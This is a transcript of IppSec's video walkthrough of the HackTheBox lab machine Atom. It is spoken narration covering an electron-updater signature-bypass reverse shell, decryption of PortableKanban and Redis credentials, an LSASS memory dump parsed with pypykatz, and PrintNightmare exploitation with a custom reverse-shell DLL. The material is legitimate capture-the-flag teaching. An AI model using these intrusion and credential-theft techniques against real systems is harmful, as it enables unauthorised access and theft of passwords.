HackTheBox - Atom
Key Takeaways
The video demonstrates how to exploit vulnerabilities in a Windows system using tools like nmap, rpcdump, and msfvenom, and how to gain system access using reverse shells and credential dumping. The video also covers topics like Electron app decompilation, SMB share exploitation, and password cracking.
Full Transcript
what's going on youtube this is ipsec i'm doing adam from hack the box which in terms of application reversing it's pretty easy you can decompile the app find out exactly what's going on or you can just run it on windows tcp dump it and see the exploit path that being said if you have no experience in application reversing this is pretty tough because you don't know exactly where to start with analyzing an electron app there's not a lot of good starting material out there for it so this is a tough easy box it starts off with exploiting the auto updated put into an application and with that you get shell on the server and then the private is based around portable kanban which we've seen before in the shop video but after we do the box once it's also vulnerable to print nightmare so we're going to go in and exploit the box that way after we do it the first way so with all that being said let's jump in as always we're going to start off with an nmap so dash sc for default scripts sv enumerate versions oh a i'll put all formats put in the nmap directory and call it atom and then the ip address of 10 10 10 to 37. this can take some time to run so i've already ran it looking at the results we can see there's four ports open the very first one is http on port 80. we can see it is running apache it's a 64-bit windows and it has the open ssl and php module loaded so if i do like a doorbust i'm definitely going to specify the php extension because if there's php files uh yeah uh we have 135 which is just msrpc then we have https and looking at the certificate its common name is localhost so it doesn't leak the host name there then we also have 445 and it's telling us it's windows 10 pro 19042 and not too much information there uh we do have a clock skew of i guess four minutes maybe and it's telling us the computer name is adam so when i look at https i'm going to specify the atom host name just to see if there's a different um virtual host and that's about it so let's go right now into my etsy host file and we're going to say atom or 101010 237 is adam so before we do anything um i'm going to run rpc dump then at 10 10 10 237 and all this is gonna do is dump a bunch of just like rpc endpoints but there was a very recent exploit that came out called printer nightmare and i'm just going to search for the microsoft remote printing and if we see it here we're going to try to do printer nightmare at the end of this video so we do have it here in order to exploit this we need a user account so we don't have any passwords so it's just kind of a note here but definitely because we see this we should try print nightmare so let's see we should open i guess firefox now and take a look at what's on the web page so opening up firefox go to 10 10 10 237 and we see a web page heed solutions we have downloads here and email and atom.htb so we have a hostname at the bottom so i'm going to add that in this and we're going to keep on going i'm just looking for other things other links i mean and i don't see anything on this about it's not going anywhere so before we dig into this box let's set up a bunch of recon so we have stuff running while we poke at it so the first thing i want to do is a full port scan so nmap dash p dash o a and map and then we'll call it adam all ports 10 10 10 237 i'm also going to run gear buster so go buster put it in dirt mode word list is going to be up set list discovery and then web content raft small words let's see lowercase this is a windows box so if i look at i'm guessing this is either index.php or index.html uh index.html windows is not case sensitive so if i do to capital n capital d we get it on linux it is case sensitive so we can't do this so that's why i'm specifying the lowercase word list with go buster because casing doesn't matter and we can save a lot of just request which saves time i'm gonna do the php extension and then output we're gonna call this go buster root php.txt uh url not set is it dash url and we'll do http 101010 237. let's see unable to connect rl i wonder if we put 10 10 10 237 there we go it's been a while since i ran gearbuster apparently so we have that running we have nmap going uh we can take a look at this page so i'm going to try just go to http atom it goes the same thing we can try atom.htb same thing https accept the certificate same thing so it doesn't look like anything special there looking at this download link we do have a slash releases directory i'm just looking at the bottom left of my screen so i'm going to try go to atom.htb releases to see if they have an open index and they do but it's only got the zip i was really hoping that like the coming soon for mac and linux would be there they just didn't link on the website but that is not the case so let's download this windows one it's gonna download heat setup so let's cp downloads heed setup.zip to adam directory and there is one piece of recon we did not run yet and that is looking at port 445. so i'm going to do smb client dash capital n capital l 10 10 10 237 and we see there is a software updates directory and i think this dash n is null authentication so i'm going to take a look at software updates so looking at software updates i just hit enter for a password we don't have one there is client one client two and client three so i'm doing a dir against each of those directories nothing there and then we also have this uat testing procedure so we download it we can look at this pdf so i'm going to open up places home then htb atom and look at the pdf and what is heed it's a note taking application built with electron builder which helps users taking important notes so this is definitely key to know we may want to research exactly what electron builder is but it's talking about a library and if a library is vulnerable then the application's vulnerable so it's talking about it um talking about the update server and that's about it so we know what we just downloaded this heat setup is a probably electron app built with electron builder and it has an auto update feature so i'm looking at this it is a setup so i'm going to do head v1 setup.exe it's a self-extracting archive and i'm sure there's a command line thing to extract this but i don't know it thankfully like gooeys are smart enough to just automatically do things so i'm going to double click on this exe and boom we have it i'm going to rename or move the plugins folder into this directory and then i'm going to rename it because i don't like my folder starting with a dollar sign so i'm going to call this um heed and we go into this and we can see it's got a few dlls and there's app 64 7-zip i'm going to make their app and we'll cp this into it and whenever i extract something i have a habit of always clobbering directories so that's why i copy it into it and then extract so 7z x to extract and you can see it put a bunch of files in this directory so if i did it in this head it would just pollute the directory and look bad so always like move stuff into a directory when you're if you want to avoid that i'm just deleting the 7-zip there so we can look at all these files and you don't have to do it this way if i had a windows machine handy which we'll go look at we just open the app and kind of do dynamic analysis what we're doing here is reversing or decompiling this electron app to get it back into javascript and then looking at it that way so there's two different ways we can do this typically i prefer just decompiling the electron app because this way we can see if there's any hard-coded secrets in it like a password so i can more easily see that so if we go into resources we have asar which is another um like zipping technology it's just data uh electron i don't know what elevate.exe is it's probably some uac thing we got appdate.yaml if we look at it it's telling us the application is at updates.adam.htb so yet another thing to put in our host so let's do updates.adam.htb and yeah it was updates so let's go to http updatesadam.htb to see if we get a different page and we don't it's still all the same okay so let's take a look at this asar and if you um don't have this tool you can do sudo npm then dash g install asar to download the extractor um and then asarl on the file so we can see all the files inside of this archive a bunch of node modules and then at the parent we have this main.js so i'm going to make the app and then cp app.asar to app go here and we can asar e app to extract uh let's see i guess we can say um yes so extract file app asar and let's just get main.js out of there i'm sure there's probably a way to extract everything with this um man asar asar h uh list extract extractor archive so if i just do asar app then dot let's see let's remove main put our working directory let's see this doesn't work we'll just move extract file asar extract then the archive and destination so something's not working clearly oh wait i probably specified f with it no okay i'm not sure i'll have to look back at the video what happened but there we go we have now extracted everything out of this asa era we can look at package.json to see what it is we do have electron updater electron log it's an open source application well maybe it's not open source anymore because i don't see a get repository on this box if we do slash dot get no nothing so we have a create note dot htm l and main.js so first thing i do is remove the archive and we can take a look at main.js so it's using electron updater it's got a function create note it's going to load out of the directory name create note template create delete quit and then app on we got a checking for updates updates available updates not available so any auto updater can we see the code for this transport file i don't see what auto updater is doing let's see grab auto update let's do a dash eye to case insensitive and hard to recursively search everything and then we can less so let's see auto updater so it's using electron updater i guess so if we look juice go back to google and we look at electron updater exploit i think let's go google.com and we have this signature validation bypass leading to rce and electron updater and it's using electron builder fail open design it's talking about a lot of things but this is the yaml file for updates so i'm going to go up a few directories and one more uh yeah there are a lot more files in here than i expected but it's all normal i'm going to make this exploit and i'm going to do latest.yaml and make this valid there we go so all this exploit is is if you have a quote within the um url or path it's going to break the signature check and let you execute code so pairing this information up with the fact there's a smb share that has software updates i'm guessing if we place a emo file that says execute a random executable it will execute so let's go and test it out i'm going to use msfvenom to list payload so we know what payload we want because i don't have all these payloads memorized i want to choose just a simple reverse shell so i'm going to do a shell reverse tcp that sounds good so msf venom dash p this and then we can say lhost 10 10 14 8 that needs to be lhost equals and then l port is equal to you guessed it 9001 can be anything i just like choosing that because well it's got to be over 9000 in my mind so i'm going to now specify um f for format exe i want to say it's f we'll find out and then we'll call it uh rev.exe so let this run we should get an executable and i'm going to file rev.exe we see it is a pe32 executable which is good that means it's in exe and it's also 64-bit i forgot to specify the architecture but it was smart enough to do that for me so that is good we have the size of seven one six eight bytes so let's go back over to our yaml file uh let's see let's move rev.exe into exploit and go into latest uh we already have it open up here let's see the size i'm gonna put update the size i don't know if we have to and then this shaw sum for it is looks like it's base 64. um typically shaw sums or any type of sum is only going to be hex so seeing like pe which is not valid hex like a through f capitals uh equal signs definitely big indicator space 64. so let's do a sha 512 sum on the executable rev.exe we only want to grab this first piece so i'm going to awk print one and then this is in hex typically when you see base64s of hashes it's a base64 of the actual data the hash isn't this it's actually the hex representation so if we do xxd dash r dash b this is the actual hash right now do wc-c 64 characters so 64 bytes i mean but this is the hash so now i can base 64 it w one dash rap to put it all on one line all right i think i said w1 it's w0 uh w1 would put like one character per line which would be hilarious but yeah wrap zero to disable line wrapping so now we can put our thing here and the version i'm going to go over one two three because i'm guessing like if it's running version four and we give it version one it's probably not gonna update so i'll do 1.3.3.7 and we'll see what happens uh we can do one three three seven there we go and then we called it rev.exe so let's see if this works um release date we can update that to be uh 2021 and we'll do today's date 07. there we go so let's do smb client 10 10 10 to 37 slash was it software updates login and let's see if we can write to any of these client directories but first nclvmp 9001 let's put latest.yaml and put rev.exe and we'll call it rev.exe with that single quote we do a dir here and let's just wait for 60 seconds to see what happens so i'm going to pause the video and we'll see what happens when that sleep finishes the sleep has not finished but i do well it finished as i was saying that but i got a reverse shell back so if i do it who am i we can see we are atom json or atom jason i don't know why my mind just went to json probably because i'm dealing with javascript but the one thing i forgot to do is rlwrap which is really annoying so i'm just gonna exit this i'm gonna do rl wrap with that reverse shell we probably have to put the files back so put rev.exe uh put rev.exe rev.exe and then put latest dot yaml okay now let's wait for another show um it's just our lrap makes the reverse shell on windows a bit more manageable so don't have tab autocomplete but tab doesn't screw things up so if i do dir we can look at that software updates directory we have examp if i go into this i can't so i don't have a mission to do that my idea was there was if i can go into the web directory write a file so this is a php server if i just write like shell.php get a reverse shell or command execution as iis then maybe i could do like a potato exploit because if i do who am i slash priv i don't have se impersonate but if i exploited a service on this box i'd most likely have that permission so since i can't write a shell i'm just going to look at the files if i go to desktop we can get the flag we have links here i could like play with editing a link to make it malicious however um jason would click that and we're already json so nothing really there look at dot config that sounds interesting uh there is a config store so let's go into this directory uh this is a um electron thing let's look in documents uh that's the uat testing procedure that we already looked at uh let's go to downloads and we have kanban so let's go into downloads portable kanban and this is i forget exactly what this application was but if you go to ipsec.rocks and search for con we can look at it being used in sharp so this piece is probably going to go pretty quick because we've done this once before so looking at dir again i'm going to pull the config so i'm just doing type uh it's probably get child item in powershell i should do to stay in powershell but i'm lazy so i'm going to copy this because i think this is just a big json file and we're going to look at it with jq on our linux machine so copying all of this come on there we go let's go to linux uh make dur uh move priv to kanban v config uh how do i insert there we go then cat config jq dot oh maybe it's what invalid numeric literal line one uh 1106 there's some piece of thing that's breaking json let's see exactly what character that was at it looks like one one zero six so if i go and just type one one zero six and then hit the pipe it brings me to that spot and i can look at what it looks like and right off the bat this is weird so maybe this isn't valid json we have a double quote a name a bracket a double quote in double quotes so this is some different serialization format so jq is um not parsing that so let's just do the lazy way of cat config and then let's set search for all commas replace them with line breaks and we can less this to go and view things so we have it doing a reddit server localhost six three seven nine i'm gonna go back to my recon and we can see when i did all ports we do see a winrm and also redis awesome so let's go looking at this we have a encrypted password of this and from the sharp machine remember kanban just stores things with a um like static secret so we can just easily um decrypt this and then get what the database password is because if i use redis let's see redis cli h 10 10 10 2 37. um let's see help let's see what can i do with redis um let's just try a simple command like ping uh we get authentication required so in order to do anything within redis we need to authenticate thankfully we have the password so i just want to go to cyber chef so go to google cyber chef go here and then the other thing we need is the kanban static secret so we can decrypt this so to do that let's go back to google search just kanban decrypt and it looks like we have an exploit right here so let's see we got the key and the initialization vector so let's go back to cyber chef um make sure we have this copied i think it's copied paste no see if i highlight this way there we go i don't know why it wasn't highlighted before but oh well so this looks like it's probably base64 um i'm going to echo dash n base64-d it gives us a bunch of gibberish but we don't see invalid data so we know it is indeed base64. if we remove a few characters um then we've like if i saw this invalid input then i may think it's just raw or something but because i didn't get that i'm gonna assume it's base64. now going back here it is dez so i'm going to copy the daz key i'm going to search for des decrypt in cyber chef and we're going to paste the key and we need initialization vector and initial is that so let's paste this and then we want to change this to be let's see is this base64 maybe so let's do base64 base64 and valid key six bytes so a dez key maybe that's eight one two three four five six seven eight so maybe that's not uh base 64. well maybe let's just draw so let's do this and unable to decrypt with those parameters change this to raw and we have it so the password is kid vs cat yes kid vs cat but we have the password decrypted so we can now go and probably use redis to dump it so we do the redis cli and then we can off so i just do off and we do the password there was no username in that config i think so off the password we get okay if i do ping it says pong so now we know we are authenticated we can do keys star to list all the keys in this database and the one that looks interesting is this right here the one that says user so i'm going to get i'm going to paste that and we have the id the names administrator email is nothing and we got the password right here it is an admin so i'm going to copy the password go back to our cyber chef paste it and the password is kid vs cat admin at one two three so i'm going to copy this and we'll do um let's see ps exec dot pi is it administrator at 10 10 10 2 37 paste the password requesting shares uploading and we have a shell we could also use like wmi exec or um evilwinrm there's a ton of ways we can get access to this but yeah the reason why i killed that is i did dir and the system 32 and where it took in forever to get output but if we go users administrator and then we look at desktop we can get root.text so that'll be pretty much the box but i said we'd look into printer nightmare so let's do that the first step is we have to get a low privilege user's password um i'm going to try to dump lsas so let's do it that way first um let's see i want to dump process run dll32 i'm looking for like a red team tips page on using run dll32 to dump a process there we go alright team so talking about all the ways we could upload many cats but that's not fun we don't want to upload mini cats we want to do this feature there we go so let's go and do task list because we have to get lsas's process uh maybe i should have used evonrom because it would have been much faster let's see evil when rm dash u administrator dash p go over here copy paste oh that's not the password let's try ctrl shift insert there we go uh dash i 10 10 10 237 there we go task list much faster so we want to look at lsas and that is running as pid 680. is that what this example was 624 close so mini dump 680 and we'll do it to users administrator documents see go and now we have lss.dumb so i think i can just do get lss.dumb um let's see it's question mark run evil winner m commands no see is it download there we go so it is downloading i type what did actually is this the file that's gonna be funny if it worked i'll have no idea how it worked um okay it did not so it is downloading now uh what directory was i in when i ran this probably where i'm at now yeah hdb adam so we gotta wait for that process to finish um in order to do this we probably have to use pie pie cats let's see python cats google is it pi cats with a k there we go this is a mimikatz implementation and python so cd art get clone it is really slow at copying files in evo1rm it's like copying it one byte at a time or something it's not that big of a file but we can get this running so let's see python three dash v what is a syntax to do virtual environment it's not dash v it's dash m for module and then vm and we're going to just create the environment v end and all this does is make it so we don't clobber ourself so we created this virtual environment directory and it loads all the python things so when i install this it's going to load it into the vm and not clobber my system very important so let's do source vm bin activate and now we see this vm prompt so we're in it so now when i do python 3 setup install it should be installing to this custom environment yeah installing pi pi cats to opt picats virtual environment bin awesome uh i don't know why it's going to hdb cloud it's doing that with something else and it made for like bad time so requirements.txt find dot grep require let's see pip three install this gonna work hey i think it does see see what i'm doing now lsvm bin do we have it let's see if it works it looks like it does so once we get this file we'll be able to use pi pi cats to hopefully dump it so i'm going to pause the video and wait for this to finish so it has finished now i can do pi pi cats we'll do lsa h and we want to either specify minidump or recall than the memory file let's try recall and then home each home ipsec htb atom ls.dump no module recall let's do mini dump see mini dump with a p and we have it extracting things so let's see if we get a password login session i'm thinking we will because a user probably is logged in interactively in order to open that atom app to get the code execution so that's administrators and tlm hash oh this is looking good and there we go we got json's pat jason's password i think i said json again jason's password right here kid vs cat electron at one two three so what we can do is crack map exec 10 10 10 to 37 smb dash u jason p to make sure this is indeed the password um see i think it's cme 10 10 10 237 like that no is okay it is don't fault it when it works so now we have jason's password so we want to do the um what is it uh let me just save this to a file so v creds json like that administrator do i still have it if i don't it's not the end of the world because we don't need any more i wish i saved the reddest password i bet i could grab it right here off yeah it's not worth it oh our lrap it's probably this one off yeah it's lost in the ether but we have the passwords that matters i just did that in case um i forget the password and can't find it so we have creds should always take notes um i'm going to search for cube0x0 print nightmare because this is the impact version of this it's on his repo so we have the cve and both the impact and the net not going to worry about the dotnet one we're just going to use in packet so cd opt and i'm going to get clone and he added a few modules to impact it so we also have to download that let's see does he say yeah he's saying uninstall impact then install his but we're gonna do a um virtual environment of impact so let's do python 3-m vm actually let's do maker print nightmare mv cve to print nightmare and then go into it and then move and pack it to this directory there we go so now we can do python3 dash m virtual environment virtual environment cd and packet then pip3 install the requirements.txt and then we can do oh thankfully it didn't really change too much but you should never do that because i did not activate my environment so source then vm activate there we go so now we can install everything and we can run setup.pi and you don't have to do that requirements to or like the pip install requirements you should just be able to run this install but copying the paren box to this screwed something up and that's how it works for me uh sometimes you don't troubleshoot things you're like oh it works that's just how life is now so that's essentially what i did there uh so we should have impacted version here we did the install so we can go into this directory and then there is one thing right now that i like this this pull request it updates the exploit to remove a brute force it's a bit more reliable if we do it this way i had to do this actually on a pen test i was on yesterday so i'm going to kind of walk through some of the troubleshooting i did because there was some type of edr blocking me from doing the uh default like creating a dll to add a user so i had to go with a reverse shell um so i'll kind of simplify it go through my troubleshooting and yeah so the only thing this poll changed was this file so i'm just going to call this update we'll call it print nightmare dot pi it doesn't really matter what we call it but i just want the updated one the other difference between this is we specify our driver name so what this exploit does is it loads a um dll or installs a printer which is just a dll so you have to call it something you can call it anything you want and i think the default for this is one two three four um let's do them this is it one two three four yeah printer name is one two three four so the updated one puts that as a argument so python 3 print nightmare dot pi we have to specify the target driver name share so let's do python3 the target is going to be jason colon the password so let's cat creds and grab jason's password and then at oh that's going to be weird um it's normally like user colon password at host name but the password has an at so i'm not sure if mpeg is going to be smart enough to only pull the last one but we'll try 10 10 10 to 37. okay the printer name will be please subscribe and then the path of the dol so in most cases you'll probably upload this to a file server in my case i uploaded it to a file share that was on a nas that accepted scans but you can upload it anywhere that the target machine can access over smb chances are it won't be able to access smb over the internet so keep that in mind when you do the exploit but nc lvmp 445 and i don't i'm not like trying to get code execution right now i just want to see if it's going to reach out to me so all i did is give it an smb and we run it and file not found wait what how is it no file not found if maybe i put this in quotes there we go so you want to put that in quotes we get a um smb thing back so we know we actually got something to execute so we have to create a dll we can use msf venom to create the dll but chances are if you just go that route you're gonna have to deal with antivirus which it's not fun so what i'm going to do is create a dll so let's go over to a windows machine and i'm going to go into visual studio and uh i have a reverse shell up already um i did not clean up from when i was working earlier so i guess i'll just show how i got this let's see open up edge and i just googled um c plus reverse shell and that went to a website like bank security let's see bank security and we can code them in anything i like c plus over.net so i went to his c plus one and if we look at the code all i did was pretty much copy this code we can see wsa startup make d word everything or make word so we have the reverse shell here i just copied it into a function and then again all of these i have up here and how the everyone like online does this exploit is instead of calling rev shell here they just call like um system and then cmd c net user ipsec please subscribe slash add and then they call like net i think local group administrators slash ad administrators ipsec something like that but this wasn't working for me not sure exactly why so i had to go with a reverse shell type route and as i was trying and with this net user and nothing was working i decided i'd compile that as x86 which is 32-bit and seeing what error message it gives me because you saw um let's see let's go into smb let's just start the server let's see touch test.dll and we can do smb server ipsure pwd okay so if i run this and we do share test.dll we can see login failure oh um i wonder if i can get rid of username password probably not i haven't actually done it this way okay i think that worked specified server can't perform the operation so that's that error message if we give it something that does not exist let's see if it says the file can't be found uh no so shoot do we have let's see i was not using um my built-in file server and in packet when i did this before so this we're going slightly different than i'm used to uh cube0x0 github let's pull it let's see smb.com is what i need okay sudo v etsy let's see cd etsy sudo cp samba smb.com to sambasmb.com as a backup sudo vi delete this file paste the new one okay so map to guest bad user share 445 that's fine gaster okay read only no okay so i just want to home ipsec htb atom smb service smbd restart sudo there we go so if we try this again with test.dll what do we get it connects it goes to execute a network name can't be found because we call it something else here comment samba maybe it is samba or smb there we go the share name is this no such user let's see force user this is getting annoying let's just force it to be me probably not the most secure thing but i like to live dangerously okay um so by just giving it a blank file this is actually the same exact error as i get from it being 32-bit exact machine type mismatch so this tells me it's actually loading the dll the first step is to give it a file that doesn't exist and you see it can't find the file specified so we have three pieces of troubleshooting right now the very first one is we just did netcat and we saw the server connected to us so we know it makes a connection the second piece is um we go on a file share and give it something that does not exist and it tells us the file does not exist so now we know number one it connects and it downloads a file then we give it a file that it can't load so in my case it was a 32-bit but if you just create a blank file you get this exe type mismatch so you know it's actually doing something with that dll so now the third piece of this is that's not the right machine is to give it a reverse shell so let's compile this for 64-bit bin rebuild solution and hopefully this works okay so i can just copy this and then we just gotta copy this dll to a box so let's go i'm gonna do 168 230 smb and we'll copy this and we just called it dll1 dll and we should do a nc lvnp uh what port was i doing it on i think i was doing an 80. let's see so 10 10 14 8 here's the port 80. we have to sudo because that's a privilege port and now we run this and boom we are now system on the box so that's doing the box through print nightmare and this is probably like how i did the troubleshooting based upon it connecting um it checking the correct file um the version mismatch between 32 and 64 bit those are all critical like troubleshooting things you just break it into smaller pieces that helps you greatly when you try to like break into this um field or if you're trying like the osep if you try and exploit it doesn't work don't like keep doing a bunch of tweaks to it try to simplify the exploit and then find out exactly like yes it's making it this far okay it's making it this far it's making it this far okay now i can do the final leap in my case um my net user command wasn't working i'm not sure if it's edr cmd.exe was blocked etc so i was just like okay how far is this going and i couldn't do the connect back to me because again it was going through a firewall but i could say okay well it's definitely checking the file share because i'm getting this file does not exist and when i give it a 32-bit file it gives me a different error so i know it's doing something with the dll so knowing that let me try changing the dll up because obviously that piece isn't working so hope you enjoyed the video take care and i will see you all next week
Original Description
00:00 - Intro
00:50 - Start of nmap
02:15 - Running RPCDump which shows if this is vulnerable to PrintNightmare (Exploit it later)
03:00 - Examining the webpage
04:15 - Explaining why i use lowercase wordlists on against Windows Webservers
06:00 - Listing shares with smbclient to find an open share
07:30 - Decompiling the Electron installer/app with asar
12:00 - Everything is extracted looking at package.json and main.js to find electron-updater
14:10 - Searching for exploits within Electron
15:30 - Using MSFVENOM to build a reverse shell
16:45 - Editing our installer YAML to point to our reverse shell
19:30 - Putting the files on the share and getting our reverse shell
21:30 - Exploring the box to find PortableKanban
22:30 - Copying the config to our box so we can extract the database password
25:40 - Using CyberChef to decrypt the Portable Kanban password
28:20 - Authenticating to Redit-CLI and dumping the user information to get administrator password
30:30 - Using rundll32 to create a memory dump of LSASS so we can extract a password
32:30 - Downloading lsass.dmp with evil-winrm
35:30 - Using Pypykatz to parse the dump file and get Jason's password
38:30 - Building our environment to perform CVE-2021-1675 (PrintNightmare)
42:50 - Using PrintNightmare to connect to our netcat to verify it is vulnerable
44:20 - Building a DLL to send a reverse shell
46:50 - Having trouble with Impacket's SMBServer, configuring our local SMBD to work with this exploit
49:20 - Reading more errors from impacket to verify we do have code execution
50:10 - Giving a file that doesn't exist to see another error... More verifying that this is working
51:20 - Giving it our ReverseShell DLL to get a reverse shell
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from IppSec · IppSec · 0 of 60
← Previous
Next →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
HHC2016 - Analytics
IppSec
HackTheBox - October
IppSec
HackTheBox - Arctic
IppSec
HackTheBox - Brainfuck
IppSec
HackTheBox - Bank
IppSec
HackTheBox - Joker
IppSec
HackTheBox - Lazy
IppSec
Camp CTF 2015 - Bitterman
IppSec
HackTheBox - Devel
IppSec
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
HackTheBox - Granny and Grandpa
IppSec
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
HackTheBox - Optimum
IppSec
HackTheBox - Charon
IppSec
HackTheBox - Sneaky
IppSec
HackTheBox - Holiday
IppSec
HackTheBox - Europa
IppSec
Introduction to tmux
IppSec
HackTheBox - Blocky
IppSec
HackTheBox - Nineveh
IppSec
HackTheBox - Jail
IppSec
HackTheBox - Blue
IppSec
HackTheBox - Calamity
IppSec
HackTheBox - Shrek
IppSec
HackTheBox - Mirai
IppSec
HackTheBox - Shocker
IppSec
HackTheBox - Mantis
IppSec
HackTheBox - Node
IppSec
HackTheBox - Kotarak
IppSec
HackTheBox - Enterprise
IppSec
HackTheBox - Sense
IppSec
HackTheBox - Minion
IppSec
VulnHub - Sokar
IppSec
VulnHub - Pinkys Palace v2
IppSec
HackTheBox - Inception
IppSec
Vulnhub - Trollcave 1.2
IppSec
HackTheBox - Ariekei
IppSec
HackTheBox - Flux Capacitor
IppSec
HackTheBox - Jeeves
IppSec
HackTheBox - Tally
IppSec
HackTheBox - CrimeStoppers
IppSec
HackTheBox - Fulcrum
IppSec
HackTheBox - Chatterbox
IppSec
HackTheBox - Falafel
IppSec
How To Create Empire Modules
IppSec
HackTheBox - Nightmare
IppSec
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
HackTheBox - Bart
IppSec
HackTheBox - Aragog
IppSec
HackTheBox - Valentine
IppSec
HackTheBox - Silo
IppSec
HackTheBox - Rabbit
IppSec
HackTheBox - Celestial
IppSec
HackTheBox - Stratosphere
IppSec
HackTheBox - Poison
IppSec
HackTheBox - Canape
IppSec
HackTheBox - Olympus
IppSec
HackTheBox - Sunday
IppSec
HackTheBox - Fighter
IppSec
HackTheBox - Bounty
IppSec
More on: LLM Foundations
View skill →Related AI Lessons
⚡
⚡
⚡
⚡
The AI Moat Paradox: The Better Models Become, the Less Models Matter
Medium · AI
170,927 AI Papers Reveal the Biggest Research Shifts of the First Half of 2026
Medium · Machine Learning
170,927 AI Papers Reveal the Biggest Research Shifts of the First Half of 2026
Medium · Data Science
[PoV] When Everyone Is Smart, No One Is
Medium · AI
Chapters (26)
Intro
0:50
Start of nmap
2:15
Running RPCDump which shows if this is vulnerable to PrintNightmare (Exploit i
3:00
Examining the webpage
4:15
Explaining why i use lowercase wordlists on against Windows Webservers
6:00
Listing shares with smbclient to find an open share
7:30
Decompiling the Electron installer/app with asar
12:00
Everything is extracted looking at package.json and main.js to find electron-u
14:10
Searching for exploits within Electron
15:30
Using MSFVENOM to build a reverse shell
16:45
Editing our installer YAML to point to our reverse shell
19:30
Putting the files on the share and getting our reverse shell
21:30
Exploring the box to find PortableKanban
22:30
Copying the config to our box so we can extract the database password
25:40
Using CyberChef to decrypt the Portable Kanban password
28:20
Authenticating to Redit-CLI and dumping the user information to get administra
30:30
Using rundll32 to create a memory dump of LSASS so we can extract a password
32:30
Downloading lsass.dmp with evil-winrm
35:30
Using Pypykatz to parse the dump file and get Jason's password
38:30
Building our environment to perform CVE-2021-1675 (PrintNightmare)
42:50
Using PrintNightmare to connect to our netcat to verify it is vulnerable
44:20
Building a DLL to send a reverse shell
46:50
Having trouble with Impacket's SMBServer, configuring our local SMBD to work w
49:20
Reading more errors from impacket to verify we do have code execution
50:10
Giving a file that doesn't exist to see another error... More verifying that t
51:20
Giving it our ReverseShell DLL to get a reverse shell
🎓
Tutor Explanation
DeepCamp AI